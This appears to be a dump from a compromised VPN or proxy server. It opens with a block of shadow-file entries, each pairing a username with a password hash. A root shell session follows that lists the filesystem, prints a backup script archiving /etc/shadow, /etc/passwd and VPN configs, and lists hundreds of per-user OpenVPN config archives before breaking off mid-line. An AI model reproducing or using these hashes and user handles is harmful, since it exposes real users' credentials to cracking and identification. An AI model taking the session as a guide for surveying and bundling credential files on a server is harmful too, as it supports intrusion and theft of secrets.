lK7CY8gP5z:ithVNEA6Zp2sY:14958:0:99999:7::14988: y5MJDV3DL9:itpXG8NQzmABo:14958:0:99999:7::14988: qAcEd9FYMX:itVRMAu6wGMC.:14958:0:99999:7::14988: GpEu7dTAI7:itB3YWx6ee0SY:14959:0:99999:7::14989: MSMzq0euqr:itiISfOIxsxaE:14959:0:99999:7::14991: inlnCLfVUo:itvhTbyWymA22:14960:0:99999:7::14990: ollSVqKLpa:itVpMPYmRMELQ:14961:0:99999:7::14991: s2C71Wifr9:itFk8miODAIbI:14961:0:99999:7::14991: UxsvWRQWBq:it7xuKEJ86nZ6:14962:0:99999:7::14992: QY6arE2Ydq:itHpW7AaspT.w:14962:0:99999:7::14992: b5sNwDdmEK:itmvq9eooqmO6:14962:0:99999:7::14992: pdpUuNAtXK:it0R6bx0FyZlE:14962:0:99999:7::14992: NxsMofNyV2:itLK/56KKYaog:14962:0:99999:7::14992: DtzoQ2Xw7q:itYVSREQMSdBw:14962:0:99999:7::14992: tDBq7HfG3r:itzVytgnZiSAU:14963:0:99999:7::14993: f8cDerX7wf:itFrqaj9jTUlU:14963:0:99999:7::14993: QoTkaCA5hf:itiV6gqc74Sqw:14963:0:99999:7::14993: Lmh9L2R8qz:itd7geSqRbFrk:14964:0:99999:7::14995: kzgMwiKIDN:itT6bPP4kO.Rw:14965:0:99999:7::14995: 6pFUWCUnmw:itvTnr5tKE9Qw:14966:0:99999:7::14996: Pgh2JWajwc:itoBQz08YAmFY:14966:0:99999:7::15056: PKSb4b3iAN:itnJSnuTJIPf.:14966:0:99999:7::14997: 5DeP78tYXf:itSvfA1ftcp52:14967:0:99999:7::15327: ZDrNQotOat:ithoGBbOmxVC6:14967:0:99999:7::14997: rd5t8jfvnj:itgFK3/lIbbHk:14970:0:99999:7::15000: vuqRa4K55i:itnwIbDrEdQQ.:14972:0:99999:7::14972: itMjMX8Zgb:itvQs9lGWMpPE:14976:0:99999:7::15006: MyxPyfxyxX:it4om/OGRqVaQ:14977:0:99999:7::15007: BcLoH5F0R3:itS5U3vZ.ZSJE:14977:0:99999:7::15007: 9T9jRHvZ7q:it/k5IGATH0sU:14977:0:99999:7::15007: ienW7EvZzk:it/3va3uNrm/g:14977:0:99999:7::15007: kdo3z10kOe:it0m6oAlzDdt2:14978:0:99999:7::15008: WX4JFyd3V4:itoQdv/BhznWg:14978:0:99999:7::15008: PAhJp3OPbl:itctUnxxabPF.:14980:0:99999:7::15010: cfmu8MNhEM:itiDjVMKDet5s:14981:0:99999:7::15011: iyW122H0oe:itERsdw.iVxl2:14981:0:99999:7::15011: 3YePbBy2tp:it0lHPhi5gXbU:14981:0:99999:7::15011: # cd / && ls -la total 176 drwxr-xr-x 20 root root 4096 Jan 6 13:13 . drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. -rw------- 1 root root 1024 May 8 2010 .rnd lrwxrwxrwx 1 root root 39 Nov 25 20:52 aquota.group -> /proc/vz/vzaquota/0000003f/aquota.group lrwxrwxrwx 1 root root 38 Nov 25 20:52 aquota.user -> /proc/vz/vzaquota/0000003f/aquota.user -rwxr-xr-x 1 root root 172 Aug 21 21:34 backup.sh drwxr-xr-x 2 root root 4096 Nov 15 02:26 bin drwxr-xr-x 2 root root 4096 Feb 2 2010 boot drwxr-xr-x 7 root root 4096 Jan 6 13:13 dev -rw-r--r-- 1 root root 4416 Sep 13 14:07 e107_files drwxr-xr-x 70 root root 4096 Jan 7 19:07 etc drwxr-xr-x 3 root root 4096 May 9 2010 home -rw------- 1 root root 0 Nov 2 10:30 ipp.txt drwxr-xr-x 10 root root 4096 May 11 2010 lib lrwxrwxrwx 1 root root 4 Nov 25 20:52 lib64 -> /lib drwxr-xr-x 2 root root 4096 Feb 2 2010 media drwxr-xr-x 2 root root 4096 Feb 2 2010 mnt drwxr-xr-x 2 root root 4096 Feb 2 2010 opt dr-xr-xr-x 171 root root 0 Jan 6 13:13 proc drwxr-xr-x 5 root root 4096 Jan 4 20:32 root drwxr-xr-x 2 root root 4096 Feb 2 2010 sbin drwxr-xr-x 2 root root 4096 Feb 2 2010 selinux drwxr-xr-x 2 root root 4096 Feb 2 2010 srv drwxr-xr-x 3 root root 0 Jan 6 13:13 sys drwxrwxrwt 4 root root 4096 Jan 7 18:12 tmp drwxr-xr-x 11 root root 4096 Feb 2 2010 usr drwxr-xr-x 14 root root 4096 Feb 2 2010 var -rwxr-xr-x 1 root root 83749 Sep 8 21:27 xgoogler # cat backup.sh #!/bin/bash name=`date | sed -e "s/ /_/g"` name=`echo "/${name}__vpn_backup.tgz"` tar cfvz "$name" /var/www/ /root/ /etc/openvpn/ /etc/sockd.conf /etc/passwd /etc/shadow # cd /root && ls -la total 92 drwxr-xr-x 5 root root 4096 Jan 4 20:32 . drwxr-xr-x 20 root root 4096 Jan 6 13:13 .. -rw------- 1 root root 6593 Jan 6 12:59 .bash_history -rw-r--r-- 1 root root 409 May 9 2010 .bashrc -rw------- 1 root root 124 Jan 3 13:02 .lesshst -rw-r--r-- 1 root root 140 Nov 19 2007 .profile -rw------- 1 root root 1024 Jan 7 05:00 .rnd drwx------ 2 root root 4096 Jun 20 2010 .ssh -rw------- 1 root root 6863 Jan 4 20:32 .viminfo -rw------- 1 root root 2288 Nov 7 00:39 .viminfo.tmp -rw------- 1 root root 0 Nov 7 00:39 .viminfz.tmp -rwxr-xr-x 1 root root 698 May 9 2010 createSSHsocks.sh -rw-r--r-- 1 root root 15716 Sep 13 14:12 e107_plugins -rwxr-xr-x 1 root root 27 Oct 27 19:50 killsockd.sh -rw-r--r-- 1 root root 5052 Aug 28 16:06 noVPNaccess -rw-r--r-- 1 root root 53 Aug 5 00:18 sshCreateLog drwx------ 2 root root 4096 Nov 7 00:39 v90992 drwx------ 2 root root 4096 Nov 7 00:39 v90992v90993 # cat killsockd.sh #!/bin/bash killall sockd # cd /var/www && ls -la total 2388 drwxr-xr-x 3 root root 36864 Jan 4 20:32 . drwxr-xr-x 14 root root 4096 Feb 2 2010 .. -rw------- 1 root root 1024 Jan 4 20:17 .rnd -rw-r--r-- 1 root root 3588 Aug 10 22:04 0x00321279_OPENVPN.tgz -rw-r--r-- 1 root root 3606 Jun 12 2010 0x0032291_OPENVPN.tgz -rw-r--r-- 1 root root 3599 Oct 7 22:28 12dima1226315_OPENVPN.tgz -rw-r--r-- 1 root root 3592 Nov 4 15:41 13scarface3731276_OPENVPN.tgz -rw-r--r-- 1 root root 3577 Dec 8 12:16 21Kms24551_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Sep 2 19:15 2fast17248_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Jul 26 23:46 3lanka19070_OPENVPN.tgz -rw-r--r-- 1 root root 3574 Nov 19 23:26 Abs0lut11214_OPENVPN.tgz -rw-r--r-- 1 root root 3409 Aug 10 18:00 Accountcc19547_OPENVPN.tgz -rw-r--r-- 1 root root 3414 Nov 26 11:45 Alanka11177_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Dec 28 13:11 Alanka30566_OPENVPN.tgz -rw-r--r-- 1 root root 3428 Oct 22 07:58 AndreWeiher00723178_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Aug 3 20:35 Anducar31060_OPENVPN.tgz -rw-r--r-- 1 root root 3566 Sep 5 08:18 Anducar7753_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Aug 29 23:55 Anony15422_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Jul 14 19:31 Anonym0us9696_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Dec 15 14:19 Axonym26091_OPENVPN.tgz -rw-r--r-- 1 root root 3606 Jul 4 2010 B0rnBaby4754_OPENVPN.tgz -rw-r--r-- 1 root root 3566 Oct 31 18:25 B4c4rd124091_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Aug 11 04:20 BEKANNTMACHUNGEN15913_OPENVPN.tgz -rw-r--r-- 1 root root 3432 Jun 4 2010 Baduila3649_OPENVPN.tgz -rw-r--r-- 1 root root 3399 Jul 26 18:01 Bero1346519125_OPENVPN.tgz -rw-r--r-- 1 root root 3570 Jul 27 14:12 Bijusov1292_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Sep 28 20:34 BlaBla14724_OPENVPN.tgz -rw-r--r-- 1 root root 3574 Sep 13 02:55 Butch1229_OPENVPN.tgz -rw-r--r-- 1 root root 3617 Jul 1 2010 Butch21700_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Aug 11 21:57 Butch26236_OPENVPN.tgz -rw-r--r-- 1 root root 3434 Nov 24 17:43 Carcharias198028154_OPENVPN.tgz -rw-r--r-- 1 root root 3424 Oct 13 15:29 Carcharias19804168_OPENVPN.tgz -rw-r--r-- 1 root root 3589 Jul 17 18:07 Chaos13009_OPENVPN.tgz -rw-r--r-- 1 root root 3419 Jun 25 2010 CherryPicker28808_OPENVPN.tgz -rw-r--r-- 1 root root 3620 Jun 17 2010 Chillywilly14043_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Jul 28 20:24 Chillywilly19583_OPENVPN.tgz -rw-r--r-- 1 root root 3431 Jun 3 2010 Chiruge7152_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Nov 23 19:44 Cifer2213003_OPENVPN.tgz -rw-r--r-- 1 root root 3567 Aug 10 22:06 Cifer2223193_OPENVPN.tgz -rw-r--r-- 1 root root 3563 Sep 13 14:35 Cifer228621_OPENVPN.tgz -rw-r--r-- 1 root root 3598 Jun 15 2010 CodeBeat13144_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Jul 17 01:56 CodeBeat24591_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Oct 17 21:55 CodeBeat31195_OPENVPN.tgz -rw-r--r-- 1 root root 3624 Jun 26 2010 Crackstar133730456_OPENVPN.tgz -rw-r--r-- 1 root root 3632 Jun 1 2010 Deadcollector6982_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Jul 20 22:40 Delphinko12230_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Oct 19 01:27 Delphinko19165_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Nov 29 16:56 Delphinko9555_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Jul 20 02:45 Device27308_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Sep 22 02:10 Device31313_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Nov 18 01:50 Device999_OPENVPN.tgz -rw-r--r-- 1 root root 3597 Oct 13 04:40 DingDong18559_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Dec 27 07:41 DingDong25025_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Nov 23 02:05 DingDong32694_OPENVPN.tgz -rw-r--r-- 1 root root 3425 May 31 2010 Dominik2990_OPENVPN.tgz -rw-r--r-- 1 root root 3580 Nov 3 03:49 DrHouse30072_OPENVPN.tgz -rw-r--r-- 1 root root 3613 Jan 3 07:10 Dukeraider16313_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Oct 21 18:07 Dukeraider16393_OPENVPN.tgz -rw-r--r-- 1 root root 3629 Jul 3 2010 Elite13372193_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Nov 12 20:49 Emrano27523_OPENVPN.tgz -rw-r--r-- 1 root root 3585 Dec 8 19:36 EsseX10367_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Aug 2 21:32 FAM0US10495_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Oct 26 19:26 Fahne18697_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Oct 10 01:51 FatJoe11716_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Nov 27 12:23 FatJoe31469_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Aug 21 20:16 FavourStyle4249_OPENVPN.tgz -rw-r--r-- 1 root root 3422 Aug 29 00:05 FaxXer14831_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Oct 21 17:55 FaxXer15844_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Dec 13 17:17 FaxXer26908_OPENVPN.tgz -rw-r--r-- 1 root root 3435 Jul 6 2010 FinalX213616_OPENVPN.tgz -rw-r--r-- 1 root root 3401 Nov 27 11:11 FireFreak26704_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Oct 15 05:21 Flex121428_OPENVPN.tgz -rw-r--r-- 1 root root 3416 Nov 26 19:01 Flex1219530_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Oct 18 15:08 Floep19230_OPENVPN.tgz -rw-r--r-- 1 root root 3587 Aug 22 03:57 Floep22106_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Nov 11 01:28 Freakstyler14325_OPENVPN.tgz -rw-r--r-- 1 root root 3629 Jun 19 2010 Freakzzor30552_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Nov 14 20:32 Fruchtii4940_OPENVPN.tgz -rw-r--r-- 1 root root 3623 Jun 19 2010 G0ETHE22157_OPENVPN.tgz -rw-r--r-- 1 root root 3571 Dec 19 15:29 G4g4m3l23565_OPENVPN.tgz -rw-r--r-- 1 root root 3567 Aug 30 11:36 G4g4m3l3086_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Jul 2 2010 GinTonic30066_OPENVPN.tgz -rw-r--r-- 1 root root 3598 Dec 17 17:05 Ginal40622069_OPENVPN.tgz -rw-r--r-- 1 root root 3404 Dec 23 15:13 HGroup29522_OPENVPN.tgz -rw-r--r-- 1 root root 3414 Aug 22 00:17 HGroup3416_OPENVPN.tgz -rw-r--r-- 1 root root 3391 Jul 13 10:15 Haloneros10917_OPENVPN.tgz -rw-r--r-- 1 root root 3396 Aug 19 16:58 Haloneros4547_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Dec 6 12:38 Haloneros7849_OPENVPN.tgz -rw-r--r-- 1 root root 3629 Jun 28 2010 Hardstyler23602_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Jul 23 19:07 Headliner16576_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Oct 11 07:05 Hellraiser15486_OPENVPN.tgz -rw-r--r-- 1 root root 3418 Dec 31 00:20 HonigMelone2260_OPENVPN.tgz -rw-r--r-- 1 root root 3402 Oct 31 03:05 HonigMelone8351_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Nov 27 01:17 Iceman3299_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Dec 19 20:35 Jaksa22983_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Jul 11 20:01 Jaksa2527_OPENVPN.tgz -rw-r--r-- 1 root root 3560 Dec 11 20:05 Jayo12320635_OPENVPN.tgz -rw-r--r-- 1 root root 3603 Jun 30 2010 Joana24614_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Nov 26 12:12 Joana25619_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Nov 3 20:28 Jondoe28020_OPENVPN.tgz -rw-r--r-- 1 root root 3410 Aug 30 02:45 Jondoe5523_OPENVPN.tgz -rw-r--r-- 1 root root 3616 Jul 9 16:47 KaLLi17527_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Nov 18 01:45 Kamill9407_OPENVPN.tgz -rw-r--r-- 1 root root 3601 Aug 17 13:08 Kasanova11582_OPENVPN.tgz -rw-r--r-- 1 root root 3612 Jul 9 14:55 Kasanova18022_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Nov 4 16:05 Kasanova19712_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Dec 15 14:30 Kasanova22555_OPENVPN.tgz -rw-r--r-- 1 root root 3598 Sep 17 17:54 Kasanova25732_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Oct 10 15:56 Keks1237082_OPENVPN.tgz -rw-r--r-- 1 root root 3569 Aug 10 21:52 Keks1238205_OPENVPN.tgz -rw-r--r-- 1 root root 3608 Dec 23 16:08 Kerber0s4146_OPENVPN.tgz -rw-r--r-- 1 root root 3612 Aug 4 13:21 KeyserSoze18958_OPENVPN.tgz -rw-r--r-- 1 root root 3435 Oct 14 16:03 KillerZwerg82931120_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Aug 25 20:36 Kluless30753_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Dec 29 15:05 Kolumbus15438_OPENVPN.tgz -rw-r--r-- 1 root root 3404 Nov 15 19:14 Kucka19807504_OPENVPN.tgz -rw-r--r-- 1 root root 3625 Jun 4 2010 LAWest26683_OPENVPN.tgz -rw-r--r-- 1 root root 3615 Jul 6 2010 LAWest32033_OPENVPN.tgz -rw-r--r-- 1 root root 3567 Dec 7 12:10 LiipTon17714_OPENVPN.tgz -rw-r--r-- 1 root root 3409 Jul 29 11:58 Loader15498_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Dec 28 12:43 Loader30988_OPENVPN.tgz -rw-r--r-- 1 root root 3614 Jun 5 2010 Loptr20388_OPENVPN.tgz -rw-r--r-- 1 root root 3580 Jul 20 17:23 Loptr27683_OPENVPN.tgz -rw-r--r-- 1 root root 3586 Aug 28 00:29 Lowne11627_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Nov 11 18:34 LuckyLuke28779_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Aug 10 22:07 M000N5312_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Nov 12 20:43 Mandy13987_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Aug 4 22:43 Mandy31362_OPENVPN.tgz -rw-r--r-- 1 root root 3607 May 12 2010 Mandy31820_OPENVPN.tgz -rw-r--r-- 1 root root 3607 Sep 2 01:46 Mantis7011486_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Aug 19 00:23 MarkusSx16847_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Sep 10 16:05 Masterlord10052_OPENVPN.tgz -rw-r--r-- 1 root root 3594 Dec 3 17:10 Maxim6745_OPENVPN.tgz -rw-r--r-- 1 root root 3421 Dec 29 15:38 McKnad15403_OPENVPN.tgz -rw-r--r-- 1 root root 3622 May 28 2010 McKnad23906_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Aug 29 18:10 McKnad2804_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Oct 3 00:19 McKnad9531_OPENVPN.tgz -rw-r--r-- 1 root root 3627 Jul 11 00:59 Morgen22283_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Aug 14 23:15 Mutti17770_OPENVPN.tgz -rw-r--r-- 1 root root 3581 Oct 5 01:40 Mutti21505_OPENVPN.tgz -rw-r--r-- 1 root root 3610 May 12 2010 Mutti8762_OPENVPN.tgz -rw-r--r-- 1 root root 3575 Nov 9 23:21 N3v107908_OPENVPN.tgz -rw-r--r-- 1 root root 3599 Jan 2 11:57 N3v108540_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Jul 30 16:17 NDTBIT12101_OPENVPN.tgz -rw-r--r-- 1 root root 3428 Oct 16 05:23 NDTBIT25949_OPENVPN.tgz -rw-r--r-- 1 root root 3413 Sep 7 20:33 NDTBIT26205_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Jul 29 04:41 Nappo10976_OPENVPN.tgz -rw-r--r-- 1 root root 3401 Aug 10 13:09 Nighty5510_OPENVPN.tgz -rw-r--r-- 1 root root 3611 Jun 3 2010 Nop0x29828_OPENVPN.tgz -rw-r--r-- 1 root root 3616 May 27 2010 Oldsql26067_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Sep 23 01:42 Pasi6512495_OPENVPN.tgz -rw-r--r-- 1 root root 3632 Jul 10 00:12 PeteSniff26963_OPENVPN.tgz -rw-r--r-- 1 root root 3622 May 22 2010 Ph0nix4947_OPENVPN.tgz -rw-r--r-- 1 root root 3635 Jun 29 2010 Phantonym17925_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Oct 26 05:43 Phiriun2823_OPENVPN.tgz -rw-r--r-- 1 root root 3409 Dec 10 17:07 Pitbull6910648_OPENVPN.tgz -rw-r--r-- 1 root root 3615 Jun 25 2010 Pl0051690_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Nov 28 08:39 Poseidon10572_OPENVPN.tgz -rw-r--r-- 1 root root 3600 Aug 16 21:45 PostMort3m12175_OPENVPN.tgz -rw-r--r-- 1 root root 3422 Sep 2 19:56 Prager28005_OPENVPN.tgz -rw-r--r-- 1 root root 3614 Jun 21 2010 Prager2997_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Aug 24 16:50 Predat0r20106_OPENVPN.tgz -rw-r--r-- 1 root root 3596 Jul 13 18:11 Predat0r9093_OPENVPN.tgz -rw-r--r-- 1 root root 3620 Jun 13 2010 Profi13618_OPENVPN.tgz -rw-r--r-- 1 root root 3623 Aug 2 01:50 Pussyrider12591_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Sep 7 02:28 Pussyrider2553_OPENVPN.tgz -rw-r--r-- 1 root root 3621 Jul 5 2010 Pwhoam7437_OPENVPN.tgz -rw-r--r-- 1 root root 3414 Nov 23 23:34 QuickSilver30900_OPENVPN.tgz -rw-r--r-- 1 root root 3436 Jun 8 2010 R0MANCE30753_OPENVPN.tgz -rw-r--r-- 1 root root 3628 Jun 29 2010 Raiden19032_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Nov 21 20:34 Rambo020232438_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Oct 4 16:22 Rambo02026184_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Jul 18 16:28 Raser8912111_OPENVPN.tgz -rw-r--r-- 1 root root 3584 Oct 19 23:52 Ratte15435_OPENVPN.tgz -rw-r--r-- 1 root root 3575 Oct 20 00:50 Ratte29885_OPENVPN.tgz -rw-r--r-- 1 root root 3573 Aug 8 14:34 Revar13568_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Sep 13 20:35 Revar186_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Aug 3 00:36 Rodney29032_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Sep 13 18:11 S3t4p3x311542_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Dec 14 12:26 Sa1nt856432005_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Sep 22 02:07 SaCuSkill19539_OPENVPN.tgz -rw-r--r-- 1 root root 3430 Jun 3 2010 Scanner22720_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Dec 27 17:07 Senninmod9366_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Dec 11 17:13 SilverFox12282_OPENVPN.tgz -rw-r--r-- 1 root root 3574 Aug 29 20:49 SilverS14224_OPENVPN.tgz -rw-r--r-- 1 root root 3431 May 15 2010 SilverS18699_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Oct 2 10:17 SilverS29996_OPENVPN.tgz -rw-r--r-- 1 root root 3590 Nov 1 15:44 SlamD7819_OPENVPN.tgz -rw-r--r-- 1 root root 3596 Nov 21 22:25 SleepyHollow30848_OPENVPN.tgz -rw-r--r-- 1 root root 3574 Aug 20 05:00 Slumski15259_OPENVPN.tgz -rw-r--r-- 1 root root 3404 Dec 11 17:30 SmileNike4939_OPENVPN.tgz -rw-r--r-- 1 root root 3628 Jun 25 2010 SonnyBlack761_OPENVPN.tgz -rw-r--r-- 1 root root 3414 Nov 18 20:30 Sparkasse19880_OPENVPN.tgz -rw-r--r-- 1 root root 3427 Jun 16 2010 Standex637_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Nov 7 23:40 Star1711657_OPENVPN.tgz -rw-r--r-- 1 root root 3407 Oct 14 20:11 Stejin14830_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Nov 29 13:23 Stejin27979_OPENVPN.tgz -rw-r--r-- 1 root root 3621 Jun 9 2010 SunDay5117_OPENVPN.tgz -rw-r--r-- 1 root root 3583 Sep 27 09:43 Swiss8114_OPENVPN.tgz -rw-r--r-- 1 root root 3572 Jul 17 22:38 Sylcore21775_OPENVPN.tgz -rw-r--r-- 1 root root 3561 Jul 16 03:23 Sylcore27550_OPENVPN.tgz -rw-r--r-- 1 root root 3627 Jul 2 2010 Syntex31511_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Nov 4 06:13 TARTAROS15648_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Jul 18 13:57 Thnallgzt1355_OPENVPN.tgz -rw-r--r-- 1 root root 3613 Dec 13 06:07 Thunder052_OPENVPN.tgz -rw-r--r-- 1 root root 3403 Oct 17 17:16 Tiberius121180_OPENVPN.tgz -rw-r--r-- 1 root root 3605 Aug 20 21:22 Tiberius25495_OPENVPN.tgz -rw-r--r-- 1 root root 3420 Aug 29 17:10 Torbon5467_OPENVPN.tgz -rw-r--r-- 1 root root 3597 Oct 4 01:41 Trinx15364_OPENVPN.tgz -rw-r--r-- 1 root root 3581 Nov 22 00:54 Trinx24908_OPENVPN.tgz -rw-r--r-- 1 root root 3593 Aug 29 21:56 Trinx31242_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Jul 11 18:39 Trinx9318_OPENVPN.tgz -rw-r--r-- 1 root root 3408 Jul 15 21:27 Tronic24834_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Jul 18 21:32 Tronic32029_OPENVPN.tgz -rw-r--r-- 1 root root 3604 May 17 2010 Tweaknap31697_OPENVPN.tgz -rw-r--r-- 1 root root 3417 Sep 16 14:41 Tzolli11813_OPENVPN.tgz -rw-r--r-- 1 root root 3414 Sep 17 00:26 Tzolli12805_OPENVPN.tgz -rw-r--r-- 1 root root 3634 Jul 2 2010 Tzolli31127_OPENVPN.tgz -rw-r--r-- 1 root root 3626 Jun 1 2010 Tzolli530_OPENVPN.tgz -rw-r--r-- 1 root root 3582 Oct 22 01:07 Ukash31388_OPENVPN.tgz -rw-r--r-- 1 root root 3581 Oct 5 15:59 WEEDtwo23015_OPENVPN.tgz -rw-r--r-- 1 root root 3557 Dec 14 17:42 WEEDtwo358_OPENVPN.tgz -rw-r--r-- 1 root root 3570 Oct 18 17:52 WalterW26039_OPENVPN.tgz -rw-r--r-- 1 root root 3567 Dec 1 14:47 WalterW5032_OPENVPN.tgz -rw-r--r-- 1 root root 3616 Jul 10 16:28 WeArEoNe5813_OPENVPN.tgz -rw-r--r-- 1 root root 3632 Jul 1 2010 Weichei4520239_OPENVPN.tgz -rw-r--r-- 1 root root 3609 Nov 21 22:43 Wursteintopf1171_OPENVPN.tgz -rw-r--r-- 1 root root 3614 Jul 9 2010 X3N0N8545_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Nov 1 20:31 Xeral1887_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Sep 13 21:52 Zerox8831175_OPENVPN.tgz -rw-r--r-- 1 root root 3571 Nov 7 19:55 Zorator17384_OPENVPN.tgz -rw-r--r-- 1 root root 3412 Jul 17 18:58 Zuraaa30069_OPENVPN.tgz -rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php -rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php -rw-r--r-- 1 root root 3574 Sep 1 00:39 adios21334_OPENVPN.tgz -rw-r--r-- 1 root root 3610 Nov 27 13:43 adminadmin663_OPENVPN.tgz -rw-r--r-- 1 root root 3395 Dec 24 05:38 analytics23444_OPENVPN.tgz -rw-r--r-- 1 root root 3408 Dec 18 08:46 andreas741128201_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Sep 25 10:41 anonymius696_OPENVPN.tgz -rw-r--r-- 1 root root 3430 Jul 6 2010 anoobis20036_OPENVPN.tgz -rw-r--r-- 1 root root 3628 Jun 18 2010 asd12322807_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Aug 2 22:29 asd12326649_OPENVPN.tgz -rw-r--r-- 1 root root 3414 Aug 3 18:40 asd12328521_OPENVPN.tgz -rw-r--r-- 1 root root 3621 Jun 25 2010 asd1233886_OPENVPN.tgz -rw-r--r-- 1 root root 3415 Jul 20 19:54 asdfg12345627545_OPENVPN.tgz -rw-r--r-- 1 root root 3405 Nov 2 15:47 asdfghjkl27874_OPENVPN.tgz -rw-r--r-- 1 root root 3564 Dec 10 07:39 awesome50_OPENVPN.tgz -rw-r--r-- 1 root root 3589 Nov 9 15:31 b0uNz18610_OPENVPN.tgz -rw-r--r-- 1 root root 3594 Dec 2 22:03 b111124378_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Oct 24 03:30 b14ckf1ag13016_OPENVPN.tgz -rw-r--r-- 1 root root 3411 Dec 15 15:30 b14ckf1ag14907_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Oct 4 17:00 b7231244_OPENVPN.tgz -rw-r--r-- 1 root root 3578 Nov 21 03:08 b72317220_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Oct 20 04:19 b72337515_OPENVPN.tgz -rw-r--r-- 1 root root 3596 Nov 9 01:37 bLackftw19898791_OPENVPN.tgz -rw-r--r-- 1 root root 3602 Oct 11 20:18 badboy10125461_OPENVPN.tgz -rw-r--r-- 1 root root 3579 Jul 17 23:40 bambuss3686_OPENVPN.tgz -rw-r--r-- 1 root root 3419 Sep 9 20:38 basics14055_OPENVPN.tgz -rw-r--r-- 1 root root 3581 Dec 27 16:44 becks1088_OPENVPN.tgz -rw-r--r-- 1 root root 3587 Nov 5 18:26 becks1540_OPENVPN.tgz -rw-r--r-- 1 root root 3406 Nov 7 19:27 bergi181219604_OPENVPN.tgz -rw-r--r-- 1 root root 3576 Aug 15 01:15 bigtwin25561_OPENVPN.tgz -rw-r--r-- 1 root root 3397 Jul 13 12:56 blackcell12902_OPENVPN.tgz -rw-r--r-- 1 root root 3641 Jun 11 2010 blackcell1900_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Aug 14 18:25 bloodyrain6388_OPENVPN.tgz -rw-r--r-- 1 root root 3604 Jun 3 2010 bluballa28446_OPENVPN.tgz -rw-r--r-- 1 root root 3584 Nov 10 